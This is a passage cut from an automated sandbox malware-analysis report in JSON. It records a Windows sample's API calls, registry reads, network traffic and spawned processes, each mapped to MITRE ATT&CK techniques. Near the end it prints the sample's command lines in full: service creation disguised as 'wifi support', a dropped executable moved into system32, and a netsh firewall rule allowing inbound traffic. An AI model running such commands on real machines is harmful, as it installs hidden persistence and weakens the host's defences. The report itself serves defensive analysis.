1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000008c4c23300300000044e56701922efafaf81200008ce56701c0e46701590000000300000048e4670150e4670118e6670150b8e26b36457990feffffff98e567016fe4e16b8c4c233098e567017ce4e16b060000000000d16a010000008fe4e16b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56701000000008e00000044e66701feffffffcce56701cf007c77d6007c77e37add768e0000004700000044e6670100000000a0e567010000000008e66701 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007298d4fa44de67016d82a87554bb290004010000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300033003900320065003600360031006200350062003900610065006600650033003800300062006100630065003700620061003500640061003900660037006200660031003100650061006300360033006400390063003800300031006500650037002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b7b77df57dd76d8ebfb75ac0121000000210000000000000000000000ffffc5000000000000000000000000000000000000000100f700c500000000000000000000000870210000000000200000000000000000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000210058282c00000000003e00003e340000c0802a2c0088422c0068bf2900f0010000000021000400000058282c00acee670104647b7738012100e0637b778371dd76000000000000210060282c006dd10f76392db3fa6cae2c760000000000000000ec01000088422c00d82f21000100000000002100500121000c00000060282c00d82f21000200000218000000ac21008d820000000000000000000000030000004cee6701820000007f07000000000000ac21008d02000000c075177688422c0000000000c075177668ee6701e830210000000000d82f2100c0ee6701ff2b7b77 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000007f7c94a10300000044e56701922efafab01100008ce56701c0e467015b0000000300000048e4670150e4670118e6670150b8e26b36457990feffffff98e567016fe4e16b7f7c94a198e567017ce4e16b820500000000d16a010000008fe4e16b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000021004045290000000000b60200b4340000c06847290098f32b00a0582c00b0110000000021000000000440452900acee670104647b7738012100e0637b778371dd760000000000002100484529006dd10f76392db3fa6cae2c760000000000000000fc00000098f32b00d82f21000100000000002100500121000c00000048452900d82f210002000002180000009906009ffa0200000000000000000000030000004cee6701fa0200001906000000000000913400a57a020000c075177660bb2c0000000000c075177668ee6701bc30210000000000d82f2100c0ee6701ff2b7b77 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000404a09ce0300000044e56701922efafa181300008ce56701c0e467015b0000000300000048e4670150e4670118e6670150b8e26b36457990feffffff98e567016fe4e16b404a09ce98e567017ce4e16b820500000000d16a010000008fe4e16b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"IsWow64Process\" with parameter \"4968\" - (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"npkqjwg.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c7a7743796975ffffffff0c0000004c627a771f796975ffffffff0c00000064ec120004000000000400000100000078ec12000a0e480000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088ea0f76ecf91200b344e16b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000723f8ffbbcf51200616b400088000000f822410081a80f76ecf9120000009001002ec40000020000080000004cc95e00 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebfb75487d29000090fd7f9a5c7c7700e0fd7fb0c967014490fd7f00000000400000003f000000250000000090fd7fa4c96701c15c7c7760828377250000000090fd7f9a5c7c7700e0fd7fc8c9670157897b778083837713176a75d8ebfb75 (UID: 00000000-00004968)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f86d1f0038fa4600145c7b77435c7b7704fb46000100000094011d0001000000b8f94600935c7c7740838377d4a07b77f22afc7704fb46000100000001000000d8bf1f000000000088f94600b8f9460024fa460095e17777b2d7c100feffffffd4a07b771bbe69750000197600000000 (UID: 00000000-00005132)\n \"npkqjwg.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000808e1e003cfc3b00145c7b77435c7b7708fd3b000100000094011c0001000000bcfb3b00935c7c7740838377d4a07b776d1a817708fd3b00010000000100000080e01e00000000008cfb3b00bcfb3b0028fc3b0095e1777729e5c100feffffffd4a07b771bbe69750000197600000000 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c7a7743796975ffffffff0c0000004c627a771f796975ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2c0000000000 (UID: 00000000-00001776)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004968-28379-269-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"npkqjwg.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"npkqjwg.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"2a61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1308480\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000009eb1b3948c8f00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d72db767b333b7670000000000000000\" - (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005100)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"npkqjwg.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\JFNXEYAE\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\npkqjwg.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\npkqjwg.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"npkqjwg.exe.67B73C01.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"npkqjwg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\npkqjwg.exe]- [targetUID: 00000000-00004968]\n \"NPKQJWG.EXE.67B73C02.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has section name .text with entropy \"6.63010280368\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has section name .text with entropy \"7.97285529131\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has section name .reloc with entropy \"6.22150956741\"\n \"npkqjwg.exe\" has section name .text with entropy \"6.63010280368\"\n \"npkqjwg.exe\" has section name .text with entropy \"7.97285529131\"\n \"npkqjwg.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (UID: 00000000-00004968)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00000868)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\npkqjwg.exe\" %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00004296)\n Spawned process \"sc.exe\" with commandline \"create jfnxeyae binPath= \"%WINDIR%\\\\system32\\\\jfnxeyae\\\\npkqjwg.exe /d\\\\\"C:\\\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00000348)\n Spawned process \"sc.exe\" with commandline \"description jfnxeyae \"wifi internet conection\"\" (UID: 00000000-00005132)\n Spawned process \"sc.exe\" with commandline \"start jfnxeyae\" (UID: 00000000-00001952)\n Spawned process \"npkqjwg.exe\" with commandline \"/d\"C:\\\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\"\" (UID: 00000000-00001776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005100)\n 